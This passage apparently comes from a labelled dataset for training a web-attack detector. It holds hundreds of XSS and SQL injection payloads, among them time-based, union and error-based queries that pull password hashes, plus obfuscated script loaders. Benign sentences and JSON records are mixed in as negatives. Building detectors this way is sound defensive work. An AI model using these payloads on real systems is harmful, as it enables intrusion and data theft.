onpointerleave=alert(1)>XSS</samp>,1,XSS,5338 -"<strong onpaste=""alert(1)"" contenteditable>test</strong>",1,XSS,4902 -"&lt;IMG STYLE=\""xss&#58;expr/*XSS*/ession(alert('XSS'))\""&gt;",1,XSS,960 -"<div draggable=""true"" contenteditable>drag me</div><noscript ondragover=alert(1) contenteditable>drop here</noscript>",1,XSS,6098 -"1'|| ( select 'hwyv' from dual where 1155 = 1155 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) ) ||'",2,SQLi,19620 -"1%' ) ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ( '%' = '",2,SQLi,18351 --4557 or 6872 = 6872-- kkte,2,SQLi,12899 -"<animate attributeName=""xlink:href"" begin=""0"" from=""javascript:alert(137)"" to=""&"" />",1,XSS,9055 -select pg_sleep ( 5 ),2,SQLi,20465 -<template id=x tabindex=1 onbeforeactivate=alert(1)></template>,1,XSS,4752 -"1'+ ( select 'ixza' where 4374 = 4374 union all select null,null,null--",2,SQLi,21316 -"1"" rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) )",2,SQLi,18479 -"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i",2,SQLi,11134 -He deleted the old posts.,0,normal,23198 -"<img onmouseenter=""alert(1)"">test</img>",1,XSS,7949 -"1' ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( 'zpzf' = 'zpzf",2,SQLi,12909 -"1%"" ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ( ""%"" = """,2,SQLi,18812 -"<applet onpaste=""alert(1)"" contenteditable>test</applet>",1,XSS,3998 -<noembed onfocusout=alert(1) tabindex=1 id=x></noembed><input autofocus>,1,XSS,7899 -"{""id"":null,""firstName"":""Kenneth Wai Keen"",""lastName"":""Tang"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,26021 -"{""id"":null,""name"":""pig""}",0,normal,25485 -Create a captivating poem.,0,normal,22890 -select ( case when ( 2676 = 4191 ) then 2676 else 1/ ( select 0 ) end ) --,2,SQLi,15516 -"1' ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( 'kejy' = 'kejy",2,SQLi,16919 -"-3865"" ) where 3559 = 3559 union all select 3559,3559,3559,3559,3559,3559,3559--",2,SQLi,18128 --9581 ) as jkqo where 5200 = 5200 or 6872 = 6872--,2,SQLi,21230 -%20$(sleep%2050),2,SQLi,10151 -"<a href=""\xE2\x80\x82javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,484 -"<style></style\x09<img src=""about:blank"" onerror=javascript:alert(1)//></style>",1,XSS,427 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#",2,SQLi,10483 -"<main onmouseleave=""alert(1)"">test</main>",1,XSS,2620 -"<div draggable=""true"" contenteditable>drag me</div><xmp ondrop=alert(1) contenteditable>drop here</xmp>",1,XSS,3939 -1%' ) rlike ( select ( case when ( 1210 = 8664 ) then 1 else 0x28 end ) ) and ( '%' = ',2,SQLi,16286 -"1 ) ) as aqpy where 4027 = 4027 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,17676 -"1' ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( 'rqbf' = 'rqbf",2,SQLi,14179 -"<xss ondblclick=""alert(1)"" autofocus tabindex=1 style=display:block>test</xss>",1,XSS,60 -"select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( 'yvbb' = 'yvbb",2,SQLi,21192 -"=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*",2,SQLi,22731 -"<optgroup onbeforepaste=""alert(1)"" contenteditable>test</optgroup>",1,XSS,3861 -"<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>",1,XSS,9186 -<noframes onpointerleave=alert(1)>XSS</noframes>,1,XSS,2068 -<output onpointerleave=alert(1)>XSS</output>,1,XSS,3904 -<IMG SRC='javascript:alert('XSS');'>,1,XSS,1665 -"<noscript onmousemove=""alert(1)"">test</noscript>",1,XSS,6065 -Select the perfect outfit for a gathering.,0,normal,24213 -"1' ) where 4407 = 4407 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,18653 -"<a href=""javascript\x3A:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,521 -5739-5738,2,SQLi,16785 -"top['a'+'l'+'e'+'r'+'t'].apply(this,[1])",1,XSS,9415 -<dl onpointerleave=alert(1)>XSS</dl>,1,XSS,8766 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#",2,SQLi,10672 -"1' ) ) ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,22211 -<content id=x tabindex=1 onbeforeactivate=alert(1)></content>,1,XSS,5365 -"1%' ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( '%' = '",2,SQLi,15648 -"1%' ) ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,19268 -"1%"" ) union all select null,null,null,null,null,null,null,null#",2,SQLi,22244 --4761 order by 1--,2,SQLi,14714 -"<marquee onmouseout=""alert(1)"">test</marquee>",1,XSS,3930 -"<div onmouseleave=""alert(1)"">test</div>",1,XSS,1880 -"{""id"":null,""name"":""Herdier""}",0,normal,25786 -Select chair.,0,normal,23217 -I need to select a movie for our movie night.,0,normal,24018 -( select ( case when ( 3950 = 2747 ) then 1 else 1/ ( select 0 ) end ) ),2,SQLi,15987 -"<a href=""javascript:alert(1)"">XSS</a>",1,XSS,147 -Show me where it's stored.,0,normal,23445 -"1 ) ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( 2748 = 2748",2,SQLi,17987 -"<style>@keyframes x{}</style><br style=""animation-name:x"" onanimationend=""alert(1)""></br>",1,XSS,5502 -WHERE 1=1 AND 1=1,2,SQLi,10272 -"1'+ ( select 'asmj' where 7808 = 7808 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) ) +'",2,SQLi,15445 -"{""id"":null,""firstName"":""Cheong"",""lastName"":""Meng"",""address"":""22 Spruce St #595"",""city"":""898"",""telephone"":""852727053""}",0,normal,25733 -"1' union all select null,null,null,null,null,null,null,null,null--",2,SQLi,17632 -1'|| ( select 'exls' where 3837 = 3837 and sleep ( 5 ) ) ||',2,SQLi,14102 -"<style>@keyframes slidein {}</style><em style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></em>",1,XSS,6836 -1'+ ( select 'qsqs' where 9227 = 9227 waitfor delay '0:0:5' ) +',2,SQLi,18544 -"1 and ascii ( lower ( substring ( ( select top 1 name from sysobjects where xtype = 'u' ) , 1, 1 ) ) ) > 116",2,SQLi,11465 -""" ) or sleep ( __TIME__ ) = """,2,SQLi,11608 -"1' ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 'xdce' = 'xdce",2,SQLi,20754 -"{""id"":null,""firstName"":""Kenneth"",""lastName"":""Chia"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25954 -"1"" ) where 4660 = 4660 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,14867 -"1 ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( 9914 = 9914",2,SQLi,17800 -"<style>:target {transform: rotate(180deg);}</style><label id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></label>",1,XSS,3573 -"1' ) where 4297 = 4297 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,16210 -<data onpointerout=alert(1)>XSS</data>,1,XSS,3020 -Select the most relevant data for analysis.,0,normal,24225 -Select a workout routine for fitness.,0,normal,24365 -"1"" rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo )",2,SQLi,17588 -<svg><font onload=alert(1)></font>,1,XSS,4366 -"1' where 6963 = 6963 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,18248 -Select vanish.,0,normal,24865 -1' ) waitfor delay '0:0:5',2,SQLi,17595 -<img src=asdf onerror=alert(document.cookie)>,1,XSS,1098 -"-5439"" or 2559 = 4692 and ""dcrf"" like ""dcrf",2,SQLi,13701 -<wbr onpointerenter=alert(1)>XSS</wbr>,1,XSS,2588 -"-2790"" ) ) as vcvw where 6075 = 6075 or 7078 = 8148--",2,SQLi,19922 -"1' where 8360 = 8360 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,19216 -1 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) -- ybmz,2,SQLi,13156 -<noembed id=x tabindex=1 onfocus=alert(1)></noembed>,1,XSS,3533 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))",2,SQLi,10764 -"<plaintext onclick=""alert(1)"">test</plaintext>",1,XSS,7718 -"{""id"":null,""firstName"":""Wei Hong"",""lastName"":""Quek"",""address"":""11839 Federalist Way, Fairfax VA 22030"",""city"":""732"",""telephone"":""1538033370""}",0,normal,25905 -"<nobr onmousemove=""alert(1)"">test</nobr>",1,XSS,4872 -"1'|| ( select 'fmss' from dual where 7025 = 7025 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) ) ||'",2,SQLi,19622 -"<div id=""39""><!-- up to Opera 11.52, FF 3.6.28 -->",1,XSS,9116 -<img2 onpointerup=alert(1)>XSS</img2>,1,XSS,4085 -"-6514 ) ) as pbgg where 6841 = 6841 union all select 6841,6841,6841,6841--",2,SQLi,12577 -"<font onkeydown=""alert(1)"" contenteditable>test</font>",1,XSS,3283 -"1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and 'nelb' = 'nelb",2,SQLi,20279 -"select * from users where id = 1 or "",&"" or 1 = 1 -- 1",2,SQLi,12072 -Select the perfect gift for a family member.,0,normal,24359 --7648' ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ),2,SQLi,12502 -"1"" ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ( ""hxgu"" = ""hxgu",2,SQLi,13716 -"1"" ) where 2278 = 2278",2,SQLi,16878 -"<pre draggable=""true"" ondragenter=""alert(1)"">test</pre>",1,XSS,7915 -"-9557 ) where 2891 = 2891 union all select 2891,2891,2891,2891,2891,2891,2891,2891,2891--",2,SQLi,19842 -"-6848"" ) ) or 4071 = 5312",2,SQLi,16753 -"-4304' where 1005 = 1005 union all select 1005,1005#",2,SQLi,15284 -"1%"" or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,13516 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><menuitem id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></menuitem>",1,XSS,5690 -"1' ) ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( 'vjhw' like 'vjhw",2,SQLi,22530 --1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A)),2,SQLi,11215 -"select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ""ihqf"" = ""ihqf",2,SQLi,14850 -"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( 'mfib' = 'mfib",2,SQLi,12238 -"1"" ) ) as whyr where 9731 = 9731 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) --",2,SQLi,17750 -"{""id"":null,""name"":""potatoes drive""}",0,normal,26066 -They must select now.,0,normal,24446 --1985 ) ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( 1248 = 1248,2,SQLi,13643 -"1 ) as mnyy where 4409 = 4409 union all select null,null,null,null--",2,SQLi,15650 -1' where 8159 = 8159 union all select null#,2,SQLi,18612 -"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i",2,SQLi,11156 -"![a](https://www.google.com/image.png""onload=""alert(1))",1,XSS,9464 -Select convey.,0,normal,24935 -"( select concat ( 0x7171706a71, ( select ( elt ( 7381 = 7381,1 ) ) ) ,0x717a767a71 ) )",2,SQLi,21959 -Select trip.,0,normal,24890 -<frame onpointerout=alert(1)>XSS</frame>,1,XSS,4144 -"1%"" ) ) ) and 7758 = 4792 and ( ( ( ""%"" = """,2,SQLi,16238 -"-5575"" union all select 8665,8665,8665,8665,8665,8665,8665--",2,SQLi,12817 -Join the discussion.,0,normal,22974 -<sub onpointermove=alert(1)>XSS</sub>,1,XSS,8829 -"1 ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,14276 -"javascript:`//""//\""//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`",1,XSS,9521 -Select your mature.,0,normal,25215 -"<bdi onbeforecopy=""alert(1)"" contenteditable>test</bdi>",1,XSS,6341 -<meta onpointerover=alert(1)>XSS</meta>,1,XSS,7202 -"{""id"":null,""name"":""Imperialdramon FM""}",0,normal,26093 -<script>onerror=alert;throw 1</script>,1,XSS,120 -"select * from users where id = 1 or 1#"" ( union select 'a',version ( ) -- 1",2,SQLi,11950 -URL=javascript:alert(''),1,XSS,8484 -"1 ) where 9213 = 9213 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,22120 -sqlvuln;,2,SQLi,10194 -"<nextid onbeforecopy=""alert(1)"" contenteditable>test</nextid>",1,XSS,3802 -1' ) ) ) rlike ( select ( case when ( 4076 = 4881 ) then 1 else 0x28 end ) ) and ( ( ( 'grzs' = 'grzs,2,SQLi,21120 -""" or ""a"" = ""a",2,SQLi,12114 -<bdi onpointerup=alert(1)>XSS</bdi>,1,XSS,5590 -"<isindex onkeyup=""alert(1)"" contenteditable>test</isindex>",1,XSS,6605 -( case when 6398 = 6398 then 1 else null end ),2,SQLi,14044 -<map id=x tabindex=1 onactivate=alert(1)></map>,1,XSS,3230 -1'|| ( select 'ucxp' where 6612 = 6612 order by 1--,2,SQLi,16544 -<img2 onpointerenter=alert(1)>XSS</img2>,1,XSS,5092 -"1%' ) union all select null,null#",2,SQLi,19589 -1 ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( 4279 = 4279,2,SQLi,18831 -"<image draggable=""true"" ondrag=""alert(1)"">test</image>",1,XSS,6077 -"<style>:target {color: red;}</style><title id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></title>",1,XSS,8049 -<caption onpointerup=alert(1)>XSS</caption>,1,XSS,6196 -"1 ) ) as tbiq where 7159 = 7159 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,16110 -"{""id"":null,""name"":""hung""}",0,normal,25312 -(alert)(1),1,XSS,3690 -<th id=x tabindex=1 onactivate=alert(1)></th>,1,XSS,8355 -1'+ ( select 'cwta' where 6091 = 6091,2,SQLi,12520 -"1' ) ) as agdn where 8442 = 8442 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) --",2,SQLi,18070 -"?page=javascript:alert(1)""",1,XSS,9933 -"{""id"":null,""name"":""that tiny""}",0,normal,25318 -"-5230"" ) or elt ( 1032 = 1032,3623 ) and ( ""aivb"" like ""aivb",2,SQLi,12694 -"<;INPUT TYPE="";IMAGE""; SRC="";javascript:alert(';XSS';);"";>;",1,XSS,1534 -"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 'dthp' = 'dthp",2,SQLi,12350 -"<br draggable=""true"" ondragleave=""alert(1)"">test</br>",1,XSS,6149 -Select a flavor for your morning smoothie.,0,normal,24316 -"<script/src=""data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)",1,XSS,9247 -ORDER BY 23,2,SQLi,10362 -1' ) where 2208 = 2208 rlike sleep ( 5 ) #,2,SQLi,13005 -<script ~~~>confirm(1)</script ~~~>,1,XSS,9768 -Carefully select the options.,0,normal,24467 -<dl onpointerdown=alert(1)>XSS</dl>,1,XSS,8460 -"1'|| ( select 'dpje' where 2704 = 2704 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,19501 -"AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 1 ) ) AND 'i' = 'i",2,SQLi,11601 -"select * from generate_series ( 3827,3827,case when ( 3827 = 7095 ) then 1 else 0 end ) limit 1--",2,SQLi,17707 -Determine conditions where applicable.,0,normal,23541 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--",2,SQLi,10617 -Let's explore where the city lights shine.,0,normal,23850 -"<dialog onclick=""alert(1)"">test</dialog>",1,XSS,3879 -<p id=x tabindex=1 onfocus=alert(1)></p>,1,XSS,5383 -"1%"" ) ) ) union all select null,null,null,null#",2,SQLi,16321 -"-1083' ) union all select 9993,9993,9993,9993,9993,9993,9993,9993,9993--",2,SQLi,12796 -"1"" where 4633 = 4633 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,13133 -"1"" ) ) as aozi where 3354 = 3354 waitfor delay '0:0:5'--",2,SQLi,15101 -<xss id=x tabindex=1 onfocusout=alert(1)></xss><input autofocus>,1,XSS,8814 -"{""id"":null,""name"":""Sandile""}",0,normal,25794 -<html onpointerover=alert(1)>XSS</html>,1,XSS,6626 -"<script>throw/x/,onerror=Uncaught=eval,h=location.hash,e=Error,e.lineNumber=e.columnNumber=e.fileName=e.message=h[2]+h[1]+h,!!window.InstallTrigger?e:e.message</script>",1,XSS,129 -"1%' and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,21214 -"<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""></OBJECT>",1,XSS,777 -); alert('XSS,1,XSS,1227 -<source onfocusout=alert(1) tabindex=1 id=x></source><input autofocus>,1,XSS,4601 -"{""id"":null,""name"":""hot""}",0,normal,25805 -end and '%' = ',2,SQLi,19601 -"1"" ) union all select null,null,null,null,null,null--",2,SQLi,14474 --9389' ) order by 1#,2,SQLi,16171 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*",2,SQLi,11024 -I select.,0,normal,24632 -21%,2,SQLi,10123 -"1"" ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ""uquh"" = ""uquh",2,SQLi,20118 -"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",2,SQLi,10711 -"-1634%' union all select 5937,5937,5937,5937--",2,SQLi,20048 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><iframe id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></iframe>",1,XSS,8123 -onMessage,1,XSS,9677 -end and ( ( 'zlsq' = 'zlsq,2,SQLi,17817 -<big onpointerenter=alert(1)>XSS</big>,1,XSS,8414 -"document.querySelector("""")",1,XSS,4004 -"{""id"":null,""name"":""Mink""}",0,normal,25742 -select ( case when ( 7852 = 7476 ) then 7852 else 7852* ( select 7852 from mysql.db ) end ) #,2,SQLi,15347 -"1"" ) ) waitfor delay '0:0:5' and ( ( ""koni"" like ""koni",2,SQLi,21768 -"1 or benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,11627 -"1"" ) ) as jmoy where 9676 = 9676 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,17669 -<<SCRIPT>alert(“XSS”);//<</SCRIPT>,1,XSS,892 -<marquee id=x tabindex=1 onbeforeactivate=alert(1)></marquee>,1,XSS,7932 -"1"" ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ""tzog"" like ""tzog",2,SQLi,14879 -"1"" where 4672 = 4672",2,SQLi,16497 -1' ) as rvli where 4427 = 4427,2,SQLi,19961 -<iframe id=x tabindex=1 onbeforedeactivate=alert(1)></iframe><input autofocus>,1,XSS,8858 -<optgroup onfocusout=alert(1) tabindex=1 id=x></optgroup><input autofocus>,1,XSS,3430 -She will select soon.,0,normal,24637 -"`'><script>\xE2\x80\x83javascript:alert(1)</script> -`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>",1,XSS,548 -"select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ""%"" = """,2,SQLi,13684 -"1' ) ) or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,16352 -"<nav oncopy=""alert(1)"" contenteditable>test</nav>",1,XSS,1874 -<hr onblur=alert(1) tabindex=1 id=x></hr><input autofocus>,1,XSS,8133 -"<small onmouseover=""alert(1)"">test</small>",1,XSS,3895 -"<output draggable=""true"" ondragleave=""alert(1)"">test</output>",1,XSS,5514 -1 ) where 5418 = 5418 union all select null--,2,SQLi,17957 -Where's the swimming pool?,0,normal,23780 -<<scr\0ipt/src=http://xss.com/xss.js></script,1,XSS,9017 -"-1647' ) ) union all select 3030,3030,3030,3030,3030,3030,3030--",2,SQLi,16122 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><element id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></element>",1,XSS,5981 -"<img onmouseleave=""alert(1)"">test</img>",1,XSS,5976 -"<?xml version=""1.0""?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>",1,XSS,739 -Select your adjust.,0,normal,25221 -"1, ( cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 7823 = 7823 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) )",2,SQLi,17347 -"<style>@keyframes x{}</style><audio style=""animation-name:x"" onanimationend=""alert(1)""></audio>",1,XSS,8035 -<dl onpointerout=alert(1)>XSS</dl>,1,XSS,6317 -"<i onbeforecut=""alert(1)"" contenteditable>test</i>",1,XSS,7797 -"<frameset onmouseleave=""alert(1)"">test</frameset>",1,XSS,8903 -"<section draggable=""true"" ondragstart=""alert(1)"">test</section>",1,XSS,6052 -He'll select wine.,0,normal,24607 -<rt id=x tabindex=1 onbeforeactivate=alert(1)></rt>,1,XSS,2046 -"1 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) -- sbvl",2,SQLi,19746 -"<summary draggable=""true"" ondragend=""alert(1)"">test</summary>",1,XSS,3097 -<audio onpointerdown=alert(1)>XSS</audio>,1,XSS,2128 -"<META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCRIPT>alert('')</SCRIPT>"">",1,XSS,7217 -"-9622' union all select 7208,7208,7208,7208#",2,SQLi,12612 -<header onpointerleave=alert(1)>XSS</header>,1,XSS,6523 -"1"" where 8732 = 8732",2,SQLi,20445 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28",2,SQLi,10804 -"1, ( select ( case when ( 5433 = 5433 ) then 1 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual )",2,SQLi,15508 -Specify filters where required.,0,normal,23479 -1%' ) ) ) rlike sleep ( 5 ) #,2,SQLi,20828 -select pg_sleep ( 5 ) and ( 'aydg' = 'aydg,2,SQLi,13369 -<link onfocus=alert(1) id=x tabindex=1 style=display:block>,1,XSS,4825 -"<kbd draggable=""true"" ondragleave=""alert(1)"">test</kbd>",1,XSS,8043 -"<sub oncontextmenu=""alert(1)"">test</sub>",1,XSS,5269 -"-9315' ) ) ) union all select 5057,5057,5057,5057,5057#",2,SQLi,15958 -<font onpointermove=alert(1)>XSS</font>,1,XSS,8088 -"d=""alert('');\"")"";",1,XSS,1848 -"-6680"" ) ) ) union all select 2564,2564,2564,2564,2564,2564#",2,SQLi,12770 -"<nobr onbeforecopy=""alert(1)"" contenteditable>test</nobr>",1,XSS,2906 -<sup onpointerenter=alert(1)>XSS</sup>,1,XSS,8791 -<image2 onpointerleave=alert(1)>XSS</image2>,1,XSS,2362 -onBeforeEditFocus,1,XSS,9630 -"<div draggable=""true"" contenteditable>drag me</div><head ondragover=alert(1) contenteditable>drop here</head>",1,XSS,2703 -1 ) as pqle where 4039 = 4039 and 7533 = 7533--,2,SQLi,17668 -<ins onpointerup=alert(1)>XSS</ins>,1,XSS,5097 -"=+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23",2,SQLi,22709 -1'+ ( select ijoh where 7145 = 7145 order by 1--,2,SQLi,13677 -"{""id"":null,""name"":""Venipede""}",0,normal,25788 -"1' ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 'novq' = 'novq",2,SQLi,15130 -"1 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) # igen",2,SQLi,12554 -<del onblur=alert(1) tabindex=1 id=x></del><input autofocus>,1,XSS,6139 -"<xss oncopy=alert(1) value=""XSS"" autofocus tabindex=1 style=display:block>test",1,XSS,58 -"1"" and sleep ( 5 ) and ""tdid"" like ""tdid",2,SQLi,12885 -1' ) ) as lkse where 9951 = 9951,2,SQLi,16560 -"<template onmouseenter=""alert(1)"">test</template>",1,XSS,8427 -select * from pg_group;,2,SQLi,22676 -"1 or extractvalue ( 1297,concat ( 